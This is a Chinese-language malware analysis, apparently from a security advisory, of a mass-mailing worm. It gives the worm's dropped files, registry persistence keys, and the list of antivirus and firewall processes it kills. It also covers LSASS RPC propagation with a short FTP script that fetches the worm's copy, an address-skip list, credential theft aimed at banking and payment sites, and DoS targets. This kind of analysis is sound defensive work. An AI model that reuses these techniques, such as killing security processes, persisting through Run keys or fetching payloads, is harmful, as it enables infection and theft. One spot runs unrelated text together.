• 被感染的系统 TCP 请求响应会变慢，并且 TCP 端口 25 [SMTP email] 会有大量数据传输现象。

• 在被感染的系统中，很多命名可能是反病毒软件或者防火墙软件的服务程序和应用程序无法运行。

• 被感染的文件会增加 15 至 20 Kb。

• 扩展名如下的文件将会被删除 -
  .pfm
  .mmm
  .ttf

• 被感染的系统会在后端不断通过 TCP 端口 80 连接到以下网站 -
  chechenpress.info
  kavkaz.org
  kavkazcenter.com

• 病毒会周期性的连接网站 'www.avestfund.info' 并获取一个信息偷盗木马程序 - 这是该病毒的一个木马插件，通过这个插件，病毒尝试获取任何包含以下字符串的登陆信息 -
  paypal
  trade
  bank
  mail
  e-gold
  e-bullion
  evocash

• 被感染的系统会通过发送一个附件名为 'PlayGirls2.exe' 的邮件来传播自己。
  
  

• 通过 SMTP 发送自己
• 通过 IPC$ 和 LSASS RPC 获取远程权限，然后通过网络把自己传播出去
• 感染目标主机上的 .EXE 文件
• 删除扩展名为 .pfb, .pfm, .mmm .ttf 的文件
• DoS 网站攻击
• 关闭反病毒软件和防火墙的应用程序以及服务进程
• 通过 IRC bot 功能响应恶意用户的命令和指令

如果病毒被执行，则会在 Windows 和 System32 目录下创建多个文件 -

___synmgr.exe - 病毒拷贝
___n.exe - 被 FSG 打包后 15,872 字节, 终止服务进程以及 IRC bot
___r.exe - 被 FSG 打包后 49,225 字节, 邮件发送及其他代码
___j.dll - 被 UPX 打包后 21,504 字节, 传播引擎
___u. - base64 编码的病毒拷贝
___m. - 文本文件, 获取主机上的 email 地址
___t. - 文本文件, 主机上获取的 email 地址个数

跟随 Windows 启动

病毒会将自己写入系统注册表，以便跟随系统启动 -

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"Microsoft Synchronization Manager" = ___synmgr.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Microsoft Synchronization Manager" = ___synmgr.exe
"Microsoft Windows DHCP" = C:\WINNT\System32\___r.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"Microsoft Synchronization Manager" = ___synmgr.exe

关闭反病毒软件和防火墙

病毒会尝试关闭包含以下字符信息的应用程序或者服务进程 -

_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
ZONALM2601.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
VIRUSMDPERSONALFIREWALL.EXE
VIR-HELP.EXE
VFSETUP.EXE
TAUMON.EXE
TASKMON.EXE
TASKMGR.EXE
TASKMG.EXE
RESCUE32.EXE
PROCESSMONITOR.EXE
PADMIN.EXE
OUTPOSTINSTALL.EXE
OUTPOST.EXE
NPROTECT.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NETUTILS.EXE
NETMON.EXE
NC2000.EXE
NAVWNT.EXE
NAVW32.EXE
NAVDX.EXE
AUTO-PROTECT.NAV80TRY.EXE
NAV.EXE
KILLPROCESSSETUP161.EXE
KERIO-WRP-421-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-PF-213-EN-WIN.EXE
KAVPF.EXE
KAVPERS40ENG.EXE
KAVLITE40ENG.EXE
JAMMER.EXE
GUARDDOG.EXE
GUARD.EXE
DRWEBUPW.EXE
DRWEB32.EXE
DRWATSON.EXE
CLICK.EXE
CLEANPC.EXE
CLEANER3.EXE
CLEANER.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVKWCTl9.EXE
AVKSERVICE.EXE
AVKSERV.EXE
AVKPOP.EXE
AVGUARD.EXE
AUTOUPDATE.EXE
AUPDATE.EXE
ATGUARD.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
　

网络系统传播

病毒会开启一个小的 FTP 服务器，从而允许发送一个自己的副本到请求的目标系统。

病毒会尝试通过 LSASS RPC 漏洞连接其他系统。当突破远程系统后，病毒会写入一个简短的 FTP 脚本文件，从而开始传送自己到新的感染主机。脚本命令如下 -
open %IP Address% %port%
l
p
get ___u.exeSubscribe
accoun
certific
listserv
ntivi
admin
mozilla
utgers.
tanford.
acketst
secur
ripe.
arin.
sendmail
ietf
iana
usenet
fido
linux
kernel
google
math
unix
berkeley
mysql
ruslis
nodomai
mydomai
example
inpris
borlan
sopho
panda
syma
abuse
spam
test
page
gold-certs
feste
submit
help
service
privacy
somebody
soft
contact
site
rating
bugs
your
someone
anyone
nothing
nobody
noone
webmaster
postmaster
samples
info
root

病毒创建一个简单信息，并只包含一个 'PlayGirls2.exe' 附件的可执行文件的邮件。

密码盗取引擎

病毒包含一个密码盗取引擎。病毒等待用户连接以下网站 -

paypal
trade
bank
mail
e-gold
e-bullion
evocash

当用户连接这些网站时，病毒会捕获这些网站的认证信息，并通过服务器端脚本将信息写入 Log 文件。

DoS 攻击

病毒携带一个 DoS 网站攻击引擎。病毒会通过 Get 方式同时连接 3 个网站，从而加重网站的负荷用来攻击网站服务器。病毒目标网站为 -

chechenpress.info
kavkaz.org
kavkazcenter.com

其他

病毒体内包含以下信息 -

[leet revers Bot]

Hah
MyDoom, Bagle, etc
since then you do not have future more!
ALAxALA